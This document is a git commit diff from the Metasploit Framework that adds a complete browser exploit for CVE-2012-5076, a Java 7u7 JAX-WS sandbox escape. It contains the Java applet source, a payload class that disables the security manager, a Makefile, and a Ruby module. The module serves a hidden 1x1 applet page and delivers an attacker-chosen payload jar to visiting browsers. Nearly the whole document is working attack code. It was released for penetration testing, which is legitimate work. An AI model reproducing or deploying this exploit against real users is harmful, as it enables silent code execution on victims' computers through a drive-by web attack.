Merge branch 'master' of git://github.com/rapid7/metasploit-framework

2012-11-12 06:34:57 +01:00 · 2012-11-12 06:34:57 +01:00 · fe1ecd83cd
parent 2fc1e1e5b2 8e7a748805
commit fe1ecd83cd
6 changed files with 239 additions and 0 deletions
--- a/data/exploits/cve-2012-5076/Exploit.class
+++ b/data/exploits/cve-2012-5076/Exploit.class
--- a/data/exploits/cve-2012-5076/MyPayload.class
+++ b/data/exploits/cve-2012-5076/MyPayload.class
--- a/external/source/exploits/cve-2012-5076/Exploit.java
+++ b/external/source/exploits/cve-2012-5076/Exploit.java
@ -0,0 +1,69 @@
+import java.applet.Applet;
+import java.io.PrintStream;
+import java.io.Serializable;
+import java.lang.reflect.Method;
+import com.sun.org.glassfish.gmbal.ManagedObjectManagerFactory;
+import com.sun.org.glassfish.gmbal.util.GenericConstructor;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+//import java.lang.Runtime;
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+    
+	public byte[] hex2Byte(String str)
+    {
+       byte[] bytes = new byte[str.length() / 2];
+       for (int i = 0; i < bytes.length; i++)
+       {
+          bytes[i] = (byte) Integer
+                .parseInt(str.substring(2 * i, 2 * i + 2), 16);
+       }
+       return bytes;
+    }
+    
+
+    public void init()
+    {
+        try
+        {
+			ByteArrayOutputStream bos = new ByteArrayOutputStream();
+			byte[] buffer = new byte[8192];
+			int length;
+
+			// read in the class file from the jar
+			InputStream is = getClass().getResourceAsStream("MyPayload.class");
+			// and write it out to the byte array stream
+			while( ( length = is.read( buffer ) ) > 0 )
+				bos.write( buffer, 0, length );
+			// convert it to a simple byte array
+			buffer = bos.toByteArray();			
+			
+            GenericConstructor genericconstructor = new GenericConstructor(Object.class, "sun.invoke.anon.AnonymousClassLoader", new Class[0]);
+            Object obj = genericconstructor.create(new Object[] {});                        
+			Method method = ManagedObjectManagerFactory.getMethod(obj.getClass(), "loadClass", new Class[] { byte[].class });
+            Class class1 = (Class)method.invoke(obj, new Object[] {
+                //byte_payload
+                buffer
+            });
+            class1.newInstance();
+            //System.out.println("SecurityManager:" + System.getSecurityManager());
+            //class1.getMethod("r", new Class[0]).invoke(class1, new Object[0]);
+            Payload.main(null);
+            //Runtime.getRuntime().exec("calc.exe");
+        }
+        catch(Exception exception)
+        {
+            //exception.printStackTrace();
+        }
+    }
+
+}
--- a/external/source/exploits/cve-2012-5076/Makefile
+++ b/external/source/exploits/cve-2012-5076/Makefile
@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	MyPayload.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/cve-2012-5076/
+	mv MyPayload.class ../../../../data/exploits/cve-2012-5076/
+
+clean:
+	rm -rf *.class
--- a/external/source/exploits/cve-2012-5076/MyPayload.java
+++ b/external/source/exploits/cve-2012-5076/MyPayload.java
@ -0,0 +1,33 @@
+import java.security.*;
+
+public class MyPayload
+    implements PrivilegedExceptionAction
+{
+
+    public MyPayload()
+    {
+        try
+        {
+            AccessController.doPrivileged(this);
+        }
+        catch(PrivilegedActionException e)
+        {
+            //e.printStackTrace();
+        }
+    }
+
+    public Object run()
+        throws Exception
+    {
+        System.setSecurityManager(null);
+        return null;
+    }
+
+    public static void r()
+        throws Exception
+    {
+		//System.out.println("hello!");
+    }
+
+
+}
--- a/modules/exploits/multi/browser/java_jre17_jaxws.rb
+++ b/modules/exploits/multi/browser/java_jre17_jaxws.rb
@ -0,0 +1,119 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'          => 'Java Applet JAX-WS Remote Code Execution',
+			'Description'   => %q{
+					This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java
+				code outside of the sandbox as exploited in the wild in November of 2012. The
+				vulnerability affects Java version 7u7 and earlier.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Unknown', # Vulnerability Discovery
+					'juan vazquez' # metasploit module
+				],
+			'References'    =>
+				[
+					[ 'CVE', '2012-5076' ],
+					[ 'OSVDB', '86363' ],
+					[ 'BID', '56054' ],
+					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],
+					[ 'URL', 'http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html' ]
+				],
+			'Platform'      => [ 'java', 'win' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					],
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Oct 16 2012'
+			))
+	end
+
+
+	def on_request_uri( cli, request )
+		if not request.uri.match(/\.jar$/i)
+			if not request.uri.match(/\/$/)
+				send_redirect(cli, get_resource() + '/', '')
+				return
+			end
+
+			print_status("#{self.name} handling request")
+
+			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
+			return
+		end
+
+		paths = [
+			[ "Exploit.class" ],
+			[ "MyPayload.class" ]
+		]
+
+		p = regenerate_payload(cli)
+
+		jar  = p.encoded_jar
+
+		paths.each do |path|
+			1.upto(path.length - 1) do |idx|
+				full = path[0,idx].join("/") + "/"
+				if !(jar.entries.map{|e|e.name}.include?(full))
+					jar.add_file(full, '')
+				end
+			end
+			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "cve-2012-5076", path ), "rb")
+			data = fd.read(fd.stat.size)
+			jar.add_file(path.join("/"), data)
+			fd.close
+		end
+
+		print_status("Sending Applet.jar")
+		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+
+		handler( cli )
+	end
+
+	def generate_html
+		jar_name = rand_text_alpha(rand(6)+3) + ".jar"
+		html  = "<html><head></head>"
+		html += "<body>"
+		html += "<applet archive=\"#{jar_name}\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+		html += "</applet></body></html>"
+		return html
+	end
+
+end